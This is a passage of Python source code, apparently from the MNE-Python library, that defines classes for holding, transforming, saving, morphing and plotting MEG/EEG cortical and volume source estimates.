if a.subject != b.subject:
raise ValueError('source estimates do not have the same subject '
'names, %r and %r' % (a.subject, b.subject))
class _BaseSourceEstimate(ToDataFrameMixin, object):
"""Abstract base class for source estimates
Parameters
----------
data : array of shape (n_dipoles, n_times) | 2-tuple (kernel, sens_data)
The data in source space. The data can either be a single array or
a tuple with two arrays: "kernel" shape (n_vertices, n_sensors) and
"sens_data" shape (n_sensors, n_times). In this case, the source
space data corresponds to "numpy.dot(kernel, sens_data)".
vertices : array | list of two arrays
Vertex numbers corresponding to the data.
tmin : float
Time point of the first sample in data.
tstep : float
Time step between successive samples in data.
subject : str | None
The subject name. While not necessary, it is safer to set the
subject parameter to avoid analysis errors.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Attributes
----------
subject : str | None
The subject name.
times : array of shape (n_times,)
The time vector.
vertices : array or list of arrays of shape (n_dipoles,)
The indices of the dipoles in the different source spaces. Can
be an array if there is only one source space (e.g., for volumes).
data : array of shape (n_dipoles, n_times)
The data in source space.
shape : tuple
The shape of the data. A tuple of int (n_dipoles, n_times).
"""
@verbose
def __init__(self, data, vertices=None, tmin=None, tstep=None,
subject=None, verbose=None):
kernel, sens_data = None, None
if isinstance(data, tuple):
if len(data) != 2:
raise ValueError('If data is a tuple it has to be length 2')
kernel, sens_data = data
data = None
if kernel.shape[1] != sens_data.shape[0]:
raise ValueError('kernel and sens_data have invalid '
'dimensions')
if isinstance(vertices, list):
if not all(isinstance(v, np.ndarray) for v in vertices):
raise ValueError('Vertices, if a list, must contain numpy '
'arrays')
if any(np.any(np.diff(v.astype(int)) <= 0) for v in vertices):
raise ValueError('Vertices must be ordered in increasing '
'order.')
n_src = sum([len(v) for v in vertices])
if len(vertices) == 1:
vertices = vertices[0]
elif isinstance(vertices, np.ndarray):
n_src = len(vertices)
else:
raise ValueError('Vertices must be a list or numpy array')
# safeguard the user against doing something silly
if data is not None and data.shape[0] != n_src:
raise ValueError('Number of vertices (%i) and stc.shape[0] (%i) '
'must match' % (n_src, data.shape[0]))
self._data = data
self.tmin = tmin
self.tstep = tstep
self.vertices = vertices
self.verbose = verbose
self._kernel = kernel
self._sens_data = sens_data
self._kernel_removed = False
self.times = None
self._update_times()
self.subject = _check_subject(None, subject, False)
def _remove_kernel_sens_data_(self):
"""Remove kernel and sensor space data and compute self._data
"""
if self._kernel is not None or self._sens_data is not None:
self._kernel_removed = True
self._data = np.dot(self._kernel, self._sens_data)
self._kernel = None
self._sens_data = None
def crop(self, tmin=None, tmax=None):
"""Restrict SourceEstimate to a time interval
Parameters
----------
tmin : float | None
The first time point in seconds. If None the first present is used.
tmax : float | None
The last time point in seconds. If None the last present is used.
"""
mask = _time_mask(self.times, tmin, tmax)
self.tmin = self.times[np.where(mask)[0][0]]
if self._kernel is not None and self._sens_data is not None:
self._sens_data = self._sens_data[:, mask]
else:
self._data = self._data[:, mask]
self._update_times()
return self # return self for chaining methods
@verbose
def resample(self, sfreq, npad=100, window='boxcar', n_jobs=1,
verbose=None):
"""Resample data
Parameters
----------
sfreq : float
New sample rate to use.
npad : int
Amount to pad the start and end of the data.
window : string or tuple
Window to use in resampling. See scipy.signal.resample.
n_jobs : int
Number of jobs to run in parallel.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Defaults to self.verbose.
Notes
-----
For some data, it may be more accurate to use npad=0 to reduce
artifacts. This is dataset dependent -- check your data!
Note that the sample rate of the original data is inferred from tstep.
"""
# resampling in sensor instead of source space gives a somewhat
# different result, so we don't allow it
self._remove_kernel_sens_data_()
o_sfreq = 1.0 / self.tstep
self._data = resample(self._data, sfreq, o_sfreq, npad, n_jobs=n_jobs)
# adjust indirectly affected variables
self.tstep = 1.0 / sfreq
self._update_times()
@property
def data(self):
"""Numpy array of source estimate data"""
if self._data is None:
# compute the solution the first time the data is accessed and
# remove the kernel and sensor data
self._remove_kernel_sens_data_()
return self._data
@property
def shape(self):
"""Shape of the data"""
if self._data is not None:
return self._data.shape
return (self._kernel.shape[0], self._sens_data.shape[1])
def _update_times(self):
"""Update the times attribute after changing tmin, tmax, or tstep"""
self.times = self.tmin + (self.tstep * np.arange(self.shape[1]))
def __add__(self, a):
stc = copy.deepcopy(self)
stc += a
return stc
def __iadd__(self, a):
self._remove_kernel_sens_data_()
if isinstance(a, _BaseSourceEstimate):
_verify_source_estimate_compat(self, a)
self._data += a.data
else:
self._data += a
return self
def mean(self):
"""Make a summary stc file with mean power between tmin and tmax.
Returns
-------
stc : instance of SourceEstimate
The modified stc (method operates inplace).
"""
data = self.data
tmax = self.tmin + self.tstep * data.shape[1]
tmin = (self.tmin + tmax) / 2.
tstep = tmax - self.tmin
mean_stc = SourceEstimate(self.data.mean(axis=1)[:, np.newaxis],
vertices=self.vertices, tmin=tmin,
tstep=tstep, subject=self.subject)
return mean_stc
def __sub__(self, a):
stc = copy.deepcopy(self)
stc -= a
return stc
def __isub__(self, a):
self._remove_kernel_sens_data_()
if isinstance(a, _BaseSourceEstimate):
_verify_source_estimate_compat(self, a)
self._data -= a.data
else:
self._data -= a
return self
def __truediv__(self, a):
return self.__div__(a)
def __div__(self, a):
stc = copy.deepcopy(self)
stc /= a
return stc
def __itruediv__(self, a):
return self.__idiv__(a)
def __idiv__(self, a):
self._remove_kernel_sens_data_()
if isinstance(a, _BaseSourceEstimate):
_verify_source_estimate_compat(self, a)
self._data /= a.data
else:
self._data /= a
return self
def __mul__(self, a):
stc = copy.deepcopy(self)
stc *= a
return stc
def __imul__(self, a):
self._remove_kernel_sens_data_()
if isinstance(a, _BaseSourceEstimate):
_verify_source_estimate_compat(self, a)
self._data *= a.data
else:
self._data *= a
return self
def __pow__(self, a):
stc = copy.deepcopy(self)
stc **= a
return stc
def __ipow__(self, a):
self._remove_kernel_sens_data_()
self._data **= a
return self
def __radd__(self, a):
return self + a
def __rsub__(self, a):
return self - a
def __rmul__(self, a):
return self * a
def __rdiv__(self, a):
return self / a
def __neg__(self):
stc = copy.deepcopy(self)
stc._remove_kernel_sens_data_()
stc._data *= -1
return stc
def __pos__(self):
return self
def sqrt(self):
"""Take the square root
Returns
-------
stc : instance of SourceEstimate
A copy of the SourceEstimate with sqrt(data).
"""
return self ** (0.5)
def copy(self):
"""Return copy of SourceEstimate instance"""
return copy.deepcopy(self)
def bin(self, width, tstart=None, tstop=None, func=np.mean):
"""Returns a SourceEstimate object with data summarized over time bins
Time bins of ``width`` seconds. This method is intended for
visualization only. No filter is applied to the data before binning,
making the method inappropriate as a tool for downsampling data.
Parameters
----------
width : scalar
Width of the individual bins in seconds.
tstart : scalar | None
Time point where the first bin starts. The default is the first
time point of the stc.
tstop : scalar | None
Last possible time point contained in a bin (if the last bin would
be shorter than width it is dropped). The default is the last time
point of the stc.
func : callable
Function that is applied to summarize the data. Needs to accept a
numpy.array as first input and an ``axis`` keyword argument.
Returns
-------
stc : instance of SourceEstimate
The binned SourceEstimate.
"""
if tstart is None:
tstart = self.tmin
if tstop is None:
tstop = self.times[-1]
times = np.arange(tstart, tstop + self.tstep, width)
nv, _ = self.shape
nt = len(times) - 1
data = np.empty((nv, nt), dtype=self.data.dtype)
for i in range(nt):
idx = (self.times >= times[i]) & (self.times < times[i + 1])
data[:, i] = func(self.data[:, idx], axis=1)
tmin = times[0] + width / 2.
stc = _make_stc(data, vertices=self.vertices,
tmin=tmin, tstep=width, subject=self.subject)
return stc
def transform_data(self, func, idx=None, tmin_idx=None, tmax_idx=None):
"""Get data after a linear (time) transform has been applied
The transorm is applied to each source time course independently.
Parameters
----------
func : callable
The transform to be applied, including parameters (see, e.g.,
`mne.fixes.partial`). The first parameter of the function is the
input data. The first return value is the transformed data,
remaining outputs are ignored. The first dimension of the
transformed data has to be the same as the first dimension of the
input data.
idx : array | None
Indicices of source time courses for which to compute transform.
If None, all time courses are used.
tmin_idx : int | None
Index of first time point to include. If None, the index of the
first time point is used.
tmax_idx : int | None
Index of the first time point not to include. If None, time points
up to (and including) the last time point are included.
Returns
-------
data_t : ndarray
The transformed data.
Notes
-----
Applying transforms can be significantly faster if the
SourceEstimate object was created using "(kernel, sens_data)", for
the "data" parameter as the transform is applied in sensor space.
Inverse methods, e.g., "apply_inverse_epochs", or "lcmv_epochs" do
this automatically (if possible).
"""
if idx is None:
# use all time courses by default
idx = slice(None, None)
if self._kernel is None and self._sens_data is None:
if self._kernel_removed:
warnings.warn('Performance can be improved by not accessing '
'the data attribute before calling this method.')
# transform source space data directly
data_t = func(self.data[idx, tmin_idx:tmax_idx])
if isinstance(data_t, tuple):
# use only first return value
data_t = data_t[0]
else:
# apply transform in sensor space
sens_data_t = func(self._sens_data[:, tmin_idx:tmax_idx])
if isinstance(sens_data_t, tuple):
# use only first return value
sens_data_t = sens_data_t[0]
# apply inverse
data_shape = sens_data_t.shape
if len(data_shape) > 2:
# flatten the last dimensions
sens_data_t = sens_data_t.reshape(data_shape[0],
np.prod(data_shape[1:]))
data_t = np.dot(self._kernel[idx, :], sens_data_t)
# restore original shape if necessary
if len(data_shape) > 2:
data_t = data_t.reshape(data_t.shape[0], *data_shape[1:])
return data_t
def transform(self, func, idx=None, tmin=None, tmax=None, copy=False):
"""Apply linear transform
The transform is applied to each source time course independently.
Parameters
----------
func : callable
The transform to be applied, including parameters (see, e.g.,
mne.fixes.partial). The first parameter of the function is the
input data. The first two dimensions of the transformed data
should be (i) vertices and (ii) time. Transforms which yield 3D
output (e.g. time-frequency transforms) are valid, so long as the
first two dimensions are vertices and time. In this case, the
copy parameter (see below) must be True and a list of
SourceEstimates, rather than a single instance of SourceEstimate,
will be returned, one for each index of the 3rd dimension of the
transformed data. In the case of transforms yielding 2D output
(e.g. filtering), the user has the option of modifying the input
inplace (copy = False) or returning a new instance of
SourceEstimate (copy = True) with the transformed data.
idx : array | None
Indices of source time courses for which to compute transform.
If None, all time courses are used.
tmin : float | int | None
First time point to include (ms). If None, self.tmin is used.
tmax : float | int | None
Last time point to include (ms). If None, self.tmax is used.
copy : bool
If True, return a new instance of SourceEstimate instead of
modifying the input inplace.
Returns
-------
stcs : instance of SourceEstimate | list
The transformed stc or, in the case of transforms which yield
N-dimensional output (where N > 2), a list of stcs. For a list,
copy must be True.
Notes
-----
Applying transforms can be significantly faster if the
SourceEstimate object was created using "(kernel, sens_data)", for
the "data" parameter as the transform is applied in sensor space.
Inverse methods, e.g., "apply_inverse_epochs", or "lcmv_epochs" do
this automatically (if possible).
"""
# min and max data indices to include
times = np.round(1000 * self.times)
t_idx = np.where(_time_mask(times, tmin, tmax))[0]
if tmin is None:
tmin_idx = None
else:
tmin_idx = t_idx[0]
if tmax is None:
tmax_idx = None
else:
tmax_idx = t_idx[-1]
data_t = self.transform_data(func, idx=idx, tmin_idx=tmin_idx,
tmax_idx=tmax_idx)
# account for change in n_vertices
if idx is not None:
idx_lh = idx[idx < len(self.lh_vertno)]
idx_rh = idx[idx >= len(self.lh_vertno)] - len(self.lh_vertno)
verts_lh = self.lh_vertno[idx_lh]
verts_rh = self.rh_vertno[idx_rh]
else:
verts_lh = self.lh_vertno
verts_rh = self.rh_vertno
verts = [verts_lh, verts_rh]
tmin_idx = 0 if tmin_idx is None else tmin_idx
tmax_idx = -1 if tmax_idx is None else tmax_idx
tmin = self.times[tmin_idx]
times = np.arange(self.times[tmin_idx],
self.times[tmax_idx] + self.tstep / 2, self.tstep)
if data_t.ndim > 2:
# return list of stcs if transformed data has dimensionality > 2
if copy:
stcs = [SourceEstimate(data_t[:, :, a], verts, tmin,
self.tstep, self.subject)
for a in range(data_t.shape[-1])]
else:
raise ValueError('copy must be True if transformed data has '
'more than 2 dimensions')
else:
# return new or overwritten stc
stcs = self if not copy else self.copy()
stcs._data, stcs.vertices = data_t, verts
stcs.tmin, stcs.times = tmin, times
return stcs
class SourceEstimate(_BaseSourceEstimate):
"""Container for surface source estimates
Parameters
----------
data : array of shape (n_dipoles, n_times) | 2-tuple (kernel, sens_data)
The data in source space. The data can either be a single array or
a tuple with two arrays: "kernel" shape (n_vertices, n_sensors) and
"sens_data" shape (n_sensors, n_times). In this case, the source
space data corresponds to "numpy.dot(kernel, sens_data)".
vertices : list of two arrays
Vertex numbers corresponding to the data.
tmin : scalar
Time point of the first sample in data.
tstep : scalar
Time step between successive samples in data.
subject : str | None
The subject name. While not necessary, it is safer to set the
subject parameter to avoid analysis errors.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Attributes
----------
subject : str | None
The subject name.
times : array of shape (n_times,)
The time vector.
vertices : list of two arrays of shape (n_dipoles,)
The indices of the dipoles in the left and right source space.
data : array of shape (n_dipoles, n_times)
The data in source space.
shape : tuple
The shape of the data. A tuple of int (n_dipoles, n_times).
"""
@verbose
def __init__(self, data, vertices=None, tmin=None, tstep=None,
subject=None, verbose=None):
if not (isinstance(vertices, list) and len(vertices) == 2):
raise ValueError('Vertices, if a list, must contain two '
'numpy arrays')
_BaseSourceEstimate.__init__(self, data, vertices=vertices, tmin=tmin,
tstep=tstep, subject=subject,
verbose=verbose)
@verbose
def save(self, fname, ftype='stc', verbose=None):
"""Save the source estimates to a file
Parameters
----------
fname : string
The stem of the file name. The file names used for surface source
spaces are obtained by adding "-lh.stc" and "-rh.stc" (or "-lh.w"
and "-rh.w") to the stem provided, for the left and the right
hemisphere, respectively.
ftype : string
File format to use. Allowed values are "stc" (default), "w",
and "h5". The "w" format only supports a single time point.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Defaults to self.verbose.
"""
if ftype not in ('stc', 'w', 'h5'):
raise ValueError('ftype must be "stc", "w", or "h5", not "%s"'
% ftype)
lh_data = self.data[:len(self.lh_vertno)]
rh_data = self.data[-len(self.rh_vertno):]
if ftype == 'stc':
logger.info('Writing STC to disk...')
_write_stc(fname + '-lh.stc', tmin=self.tmin, tstep=self.tstep,
vertices=self.lh_vertno, data=lh_data)
_write_stc(fname + '-rh.stc', tmin=self.tmin, tstep=self.tstep,
vertices=self.rh_vertno, data=rh_data)
elif ftype == 'w':
if self.shape[1] != 1:
raise ValueError('w files can only contain a single time '
'point')
logger.info('Writing STC to disk (w format)...')
_write_w(fname + '-lh.w', vertices=self.lh_vertno,
data=lh_data[:, 0])
_write_w(fname + '-rh.w', vertices=self.rh_vertno,
data=rh_data[:, 0])
elif ftype == 'h5':
write_hdf5(fname + '-stc.h5',
dict(vertices=self.vertices, data=self.data,
tmin=self.tmin, tstep=self.tstep,
subject=self.subject), title='mnepython')
logger.info('[done]')
def __repr__(self):
if isinstance(self.vertices, list):
nv = sum([len(v) for v in self.vertices])
else:
nv = self.vertices.size
s = "%d vertices" % nv
if self.subject is not None:
s += ", subject : %s" % self.subject
s += ", tmin : %s (ms)" % (1e3 * self.tmin)
s += ", tmax : %s (ms)" % (1e3 * self.times[-1])
s += ", tstep : %s (ms)" % (1e3 * self.tstep)
s += ", data size : %s x %s" % self.shape
return "<SourceEstimate | %s>" % s
@property
def lh_data(self):
return self.data[:len(self.lh_vertno)]
@property
def rh_data(self):
return self.data[len(self.lh_vertno):]
@property
def lh_vertno(self):
return self.vertices[0]
@property
def rh_vertno(self):
return self.vertices[1]
def _hemilabel_stc(self, label):
if label.hemi == 'lh':
stc_vertices = self.vertices[0]
else:
stc_vertices = self.vertices[1]
# find index of the Label's vertices
idx = np.nonzero(in1d(stc_vertices, label.vertices))[0]
# find output vertices
vertices = stc_vertices[idx]
# find data
if label.hemi == 'rh':
values = self.data[idx + len(self.vertices[0])]
else:
values = self.data[idx]
return vertices, values
def in_label(self, label):
"""Returns a SourceEstimate object restricted to a label
SourceEstimate contains the time course of
activation of all sources inside the label.
Parameters
----------
label : Label | BiHemiLabel
The label (as created for example by mne.read_label). If the label
does not match any sources in the SourceEstimate, a ValueError is
raised.
"""
# make sure label and stc are compatible
if label.subject is not None and self.subject is not None \
and label.subject != self.subject:
raise RuntimeError('label and stc must have same subject names, '
'currently "%s" and "%s"' % (label.subject,
self.subject))
if label.hemi == 'both':
lh_vert, lh_val = self._hemilabel_stc(label.lh)
rh_vert, rh_val = self._hemilabel_stc(label.rh)
vertices = [lh_vert, rh_vert]
values = np.vstack((lh_val, rh_val))
elif label.hemi == 'lh':
lh_vert, values = self._hemilabel_stc(label)
vertices = [lh_vert, np.array([], int)]
elif label.hemi == 'rh':
rh_vert, values = self._hemilabel_stc(label)
vertices = [np.array([], int), rh_vert]
else:
raise TypeError("Expected Label or BiHemiLabel; got %r" % label)
if sum([len(v) for v in vertices]) == 0:
raise ValueError('No vertices match the label in the stc file')
label_stc = SourceEstimate(values, vertices=vertices,
tmin=self.tmin, tstep=self.tstep,
subject=self.subject)
return label_stc
def expand(self, vertices):
"""Expand SourceEstimate to include more vertices
This will add rows to stc.data (zero-filled) and modify stc.vertices
to include all vertices in stc.vertices and the input vertices.
Parameters
----------
vertices : list of array
New vertices to add. Can also contain old values.
Returns
-------
stc : instance of SourceEstimate
The modified stc (note: method operates inplace).
"""
if not isinstance(vertices, list):
raise TypeError('vertices must be a list')
if not len(self.vertices) == len(vertices):
raise ValueError('vertices must have the same length as '
'stc.vertices')
# can no longer use kernel and sensor data
self._remove_kernel_sens_data_()
inserters = list()
offsets = [0]
for vi, (v_old, v_new) in enumerate(zip(self.vertices, vertices)):
v_new = np.setdiff1d(v_new, v_old)
inds = np.searchsorted(v_old, v_new)
# newer numpy might overwrite inds after np.insert, copy here
inserters += [inds.copy()]
offsets += [len(v_old)]
self.vertices[vi] = np.insert(v_old, inds, v_new)
inds = [ii + offset for ii, offset in zip(inserters, offsets[:-1])]
inds = np.concatenate(inds)
new_data = np.zeros((len(inds), self._data.shape[1]))
self._data = np.insert(self._data, inds, new_data, axis=0)
return self
@verbose
def extract_label_time_course(self, labels, src, mode='mean_flip',
allow_empty=False, verbose=None):
"""Extract label time courses for lists of labels
This function will extract one time course for each label. The way the
time courses are extracted depends on the mode parameter.
Valid values for mode are:
- 'mean': Average within each label.
- 'mean_flip': Average within each label with sign flip depending
on source orientation.
- 'pca_flip': Apply an SVD to the time courses within each label
and use the scaled and sign-flipped first right-singular vector
as the label time course. The scaling is performed such that the
power of the label time course is the same as the average
per-vertex time course power within the label. The sign of the
resulting time course is adjusted by multiplying it with
"sign(dot(u, flip))" where u is the first left-singular vector,
and flip is a sing-flip vector based on the vertex normals. This
procedure assures that the phase does not randomly change by 180
degrees from one stc to the next.
- 'max': Max value within each label.
Parameters
----------
labels : Label | list of Label
The labels for which to extract the time courses.
src : list
Source spaces for left and right hemisphere.
mode : str
Extraction mode, see explanation above.
allow_empty : bool
Instead of emitting an error, return all-zero time course for
labels that do not have any vertices in the source estimate.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
label_tc : array, shape=(len(labels), n_times)
Extracted time course for each label.
See Also
--------
extract_label_time_course : extract time courses for multiple STCs
"""
label_tc = extract_label_time_course(self, labels, src, mode=mode,
return_generator=False,
allow_empty=allow_empty,
verbose=verbose)
return label_tc
def center_of_mass(self, subject=None, hemi=None, restrict_vertices=False,
subjects_dir=None):
"""Return the vertex on a given surface that is at the center of mass
of the activity in stc. Note that all activity must occur in a single
hemisphere, otherwise an error is returned. The "mass" of each point in
space for computing the spatial center of mass is computed by summing
across time, and vice-versa for each point in time in computing the
temporal center of mass. This is useful for quantifying spatio-temporal
cluster locations, especially when combined with the function
mne.source_space.vertex_to_mni().
Parameters
----------
subject : string | None
The subject the stc is defined for.
hemi : int, or None
Calculate the center of mass for the left (0) or right (1)
hemisphere. If None, one of the hemispheres must be all zeroes,
and the center of mass will be calculated for the other
hemisphere (useful for getting COM for clusters).
restrict_vertices : bool, or array of int
If True, returned vertex will be one from stc. Otherwise, it could
be any vertex from surf. If an array of int, the returned vertex
will come from that array. For most accuruate estimates, do not
restrict vertices.
subjects_dir : str, or None
Path to the SUBJECTS_DIR. If None, the path is obtained by using
the environment variable SUBJECTS_DIR.
Returns
-------
vertex : int
Vertex of the spatial center of mass for the inferred hemisphere,
with each vertex weighted by the sum of the stc across time. For a
boolean stc, then, this would be weighted purely by the duration
each vertex was active.
hemi : int
Hemisphere the vertex was taken from.
t : float
Time of the temporal center of mass (weighted by the sum across
source vertices).
References:
Used in Larson and Lee, "The cortical dynamics underlying effective
switching of auditory spatial attention", NeuroImage 2012.
"""
subject = _check_subject(self.subject, subject)
values = np.sum(self.data, axis=1) # sum across time
vert_inds = [np.arange(len(self.vertices[0])),
np.arange(len(self.vertices[1])) + len(self.vertices[0])]
if hemi is None:
hemi = np.where(np.array([np.sum(values[vi])
for vi in vert_inds]))[0]
if not len(hemi) == 1:
raise ValueError('Could not infer hemisphere')
hemi = hemi[0]
if hemi not in [0, 1]:
raise ValueError('hemi must be 0 or 1')
subjects_dir = get_subjects_dir(subjects_dir, raise_error=True)
values = values[vert_inds[hemi]]
hemis = ['lh', 'rh']
surf = os.path.join(subjects_dir, subject, 'surf',
hemis[hemi] + '.sphere')
if isinstance(surf, string_types): # read in surface
surf = read_surface(surf)
if restrict_vertices is False:
restrict_vertices = np.arange(surf[0].shape[0])
elif restrict_vertices is True:
restrict_vertices = self.vertices[hemi]
if np.any(self.data < 0):
raise ValueError('Cannot compute COM with negative values')
pos = surf[0][self.vertices[hemi], :].T
c_o_m = np.sum(pos * values, axis=1) / np.sum(values)
# Find the vertex closest to the COM
vertex = np.argmin(np.sqrt(np.mean((surf[0][restrict_vertices, :] -
c_o_m) ** 2, axis=1)))
vertex = restrict_vertices[vertex]
# do time center of mass by using the values across space
masses = np.sum(self.data, axis=0).astype(float)
t_ind = np.sum(masses * np.arange(self.shape[1])) / np.sum(masses)
t = self.tmin + self.tstep * t_ind
return vertex, hemi, t
def plot(self, subject=None, surface='inflated', hemi='lh',
colormap='auto', time_label='time=%0.2f ms',
smoothing_steps=10, transparent=None, alpha=1.0,
time_viewer=False, config_opts=None, subjects_dir=None,
figure=None, views='lat', colorbar=True, clim='auto'):
"""Plot SourceEstimates with PySurfer
Note: PySurfer currently needs the SUBJECTS_DIR environment variable,
which will automatically be set by this function. Plotting multiple
SourceEstimates with different values for subjects_dir will cause
PySurfer to use the wrong FreeSurfer surfaces when using methods of
the returned Brain object. It is therefore recommended to set the
SUBJECTS_DIR environment variable or always use the same value for
subjects_dir (within the same Python session).
Parameters
----------
subject : str | None
The subject name corresponding to FreeSurfer environment
variable SUBJECT. If None stc.subject will be used. If that
is None, the environment will be used.
surface : str
The type of surface (inflated, white etc.).
hemi : str, 'lh' | 'rh' | 'split' | 'both'
The hemisphere to display.
colormap : str | np.ndarray of float, shape(n_colors, 3 | 4)
Name of colormap to use or a custom look up table. If array, must
be (n x 3) or (n x 4) array for with RGB or RGBA values between
0 and 255. If 'auto', either 'hot' or 'mne' will be chosen
based on whether 'lims' or 'pos_lims' are specified in `clim`.
time_label : str
How to print info about the time instant visualized.
smoothing_steps : int
The amount of smoothing.
transparent : bool | None
If True, use a linear transparency between fmin and fmid.
None will choose automatically based on colormap type.
alpha : float
Alpha value to apply globally to the overlay.
time_viewer : bool
Display time viewer GUI.
config_opts : dict
Keyword arguments for Brain initialization.
See pysurfer.viz.Brain.
subjects_dir : str
The path to the FreeSurfer subjects reconstructions.
It corresponds to FreeSurfer environment variable SUBJECTS_DIR.
figure : instance of mayavi.core.scene.Scene | None
If None, the last figure will be cleaned and a new figure will
be created.
views : str | list
View to use. See surfer.Brain().
colorbar : bool
If True, display colorbar on scene.
clim : str | dict
Colorbar properties specification. If 'auto', set clim
automatically based on data percentiles. If dict, should contain:
kind : str
Flag to specify type of limits. 'value' or 'percent'.
lims : list | np.ndarray | tuple of float, 3 elements
Note: Only use this if 'colormap' is not 'mne'.
Left, middle, and right bound for colormap.
pos_lims : list | np.ndarray | tuple of float, 3 elements
Note: Only use this if 'colormap' is 'mne'.
Left, middle, and right bound for colormap. Positive values
will be mirrored directly across zero during colormap
construction to obtain negative control points.
Returns
-------
brain : Brain
A instance of surfer.viz.Brain from PySurfer.
"""
brain = plot_source_estimates(self, subject, surface=surface,
hemi=hemi, colormap=colormap,
time_label=time_label,
smoothing_steps=smoothing_steps,
transparent=transparent, alpha=alpha,
time_viewer=time_viewer,
config_opts=config_opts,
subjects_dir=subjects_dir, figure=figure,
views=views, colorbar=colorbar,
clim=clim)
return brain
@verbose
def to_original_src(self, src_orig, subject_orig=None,
subjects_dir=None, verbose=None):
"""Return a SourceEstimate from morphed source to the original subject
Parameters
----------
src_orig : instance of SourceSpaces
The original source spaces that were morphed to the current
subject.
subject_orig : str | None
The original subject. For most source spaces this shouldn't need
to be provided, since it is stored in the source space itself.
subjects_dir : string, or None
Path to SUBJECTS_DIR if it is not set in the environment.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
See Also
--------
morph_source_spaces
Notes
-----
.. versionadded:: 0.10.0
"""
if self.subject is None:
raise ValueError('stc.subject must be set')
src_orig = _ensure_src(src_orig, kind='surf')
subject_orig = _ensure_src_subject(src_orig, subject_orig)
data_idx, vertices = _get_morph_src_reordering(
self.vertices, src_orig, subject_orig, self.subject, subjects_dir)
return SourceEstimate(self._data[data_idx], vertices,
self.tmin, self.tstep, subject_orig)
@verbose
def morph(self, subject_to, grade=5, smooth=None, subjects_dir=None,
buffer_size=64, n_jobs=1, subject_from=None, sparse=False,
verbose=None):
"""Morph a source estimate from one subject to another
Parameters
----------
subject_to : string
Name of the subject on which to morph as named in the SUBJECTS_DIR
grade : int, list (of two arrays), or None
Resolution of the icosahedral mesh (typically 5). If None, all
vertices will be used (potentially filling the surface). If a list,
then values will be morphed to the set of vertices specified in
in grade[0] and grade[1]. Note that specifying the vertices (e.g.,
grade=[np.arange(10242), np.arange(10242)] for fsaverage on a
standard grade 5 source space) can be substantially faster than
computing vertex locations. Note that if subject='fsaverage'
and 'grade=5', this set of vertices will automatically be used
(instead of computed) for speed, since this is a common morph.
NOTE : If sparse=True, grade has to be set to None.
smooth : int or None
Number of iterations for the smoothing of the surface data.
If None, smooth is automatically defined to fill the surface
with non-zero values.
subjects_dir : string, or None
Path to SUBJECTS_DIR if it is not set in the environment.
buffer_size : int
Morph data in chunks of `buffer_size` time instants.
Saves memory when morphing long time intervals.
n_jobs : int
Number of jobs to run in parallel.
subject_from : string
Name of the original subject as named in the SUBJECTS_DIR.
If None, self.subject will be used.
sparse : bool
Morph as a sparse source estimate. If True the only
parameters used are subject_to and subject_from,
and grade has to be None.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
stc_to : SourceEstimate
Source estimate for the destination subject.
"""
subject_from = _check_subject(self.subject, subject_from)
if sparse:
if grade is not None:
raise RuntimeError('grade must be set to None if sparse=True.')
return _morph_sparse(self, subject_from, subject_to, subjects_dir)
else:
return morph_data(subject_from, subject_to, self, grade, smooth,
subjects_dir, buffer_size, n_jobs, verbose)
def morph_precomputed(self, subject_to, vertices_to, morph_mat,
subject_from=None):
"""Morph source estimate between subjects using a precomputed matrix
Parameters
----------
subject_to : string
Name of the subject on which to morph as named in the SUBJECTS_DIR.
vertices_to : list of array of int
The vertices on the destination subject's brain.
morph_mat : sparse matrix
The morphing matrix, usually from compute_morph_matrix.
subject_from : string | None
Name of the original subject as named in the SUBJECTS_DIR.
If None, self.subject will be used.
Returns
-------
stc_to : SourceEstimate
Source estimate for the destination subject.
"""
subject_from = _check_subject(self.subject, subject_from)
return morph_data_precomputed(subject_from, subject_to, self,
vertices_to, morph_mat)
def get_peak(self, hemi=None, tmin=None, tmax=None, mode='abs',
vert_as_index=False, time_as_index=False):
"""Get location and latency of peak amplitude
Parameters
----------
hemi : {'lh', 'rh', None}
The hemi to be considered. If None, the entire source space is
considered.
tmin : float | None
The minimum point in time to be considered for peak getting.
tmax : float | None
The maximum point in time to be considered for peak getting.
mode : {'pos', 'neg', 'abs'}
How to deal with the sign of the data. If 'pos' only positive
values will be considered. If 'neg' only negative values will
be considered. If 'abs' absolute values will be considered.
Defaults to 'abs'.
vert_as_index : bool
whether to return the vertex index instead of of its ID.
Defaults to False.
time_as_index : bool
Whether to return the time index instead of the latency.
Defaults to False.
Returns
-------
pos : int
The vertex exhibiting the maximum response, either ID or index.
latency : float | int
The time point of the maximum response, either latency in seconds
or index.
"""
data = {'lh': self.lh_data, 'rh': self.rh_data, None: self.data}[hemi]
vertno = {'lh': self.lh_vertno, 'rh': self.rh_vertno,
None: np.concatenate(self.vertices)}[hemi]
vert_idx, time_idx = _get_peak(data, self.times, tmin, tmax, mode)
return (vert_idx if vert_as_index else vertno[vert_idx],
time_idx if time_as_index else self.times[time_idx])
class VolSourceEstimate(_BaseSourceEstimate):
"""Container for volume source estimates
Parameters
----------
data : array of shape (n_dipoles, n_times) | 2-tuple (kernel, sens_data)
The data in source space. The data can either be a single array or
a tuple with two arrays: "kernel" shape (n_vertices, n_sensors) and
"sens_data" shape (n_sensors, n_times). In this case, the source
space data corresponds to "numpy.dot(kernel, sens_data)".
vertices : array
Vertex numbers corresponding to the data.
tmin : scalar
Time point of the first sample in data.
tstep : scalar
Time step between successive samples in data.
subject : str | None
The subject name. While not necessary, it is safer to set the
subject parameter to avoid analysis errors.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Attributes
----------
subject : str | None
The subject name.
times : array of shape (n_times,)
The time vector.
vertices : array of shape (n_dipoles,)
The indices of the dipoles in the source space.
data : array of shape (n_dipoles, n_times)
The data in source space.
shape : tuple
The shape of the data. A tuple of int (n_dipoles, n_times).
Notes
-----
.. versionadded:: 0.9.0
"""
@verbose
def __init__(self, data, vertices=None, tmin=None, tstep=None,
subject=None, verbose=None):
if not (isinstance(vertices, np.ndarray) or
isinstance(vertices, list) and len(vertices) == 1):
raise ValueError('Vertices must be a numpy array or a list with '
'one array')
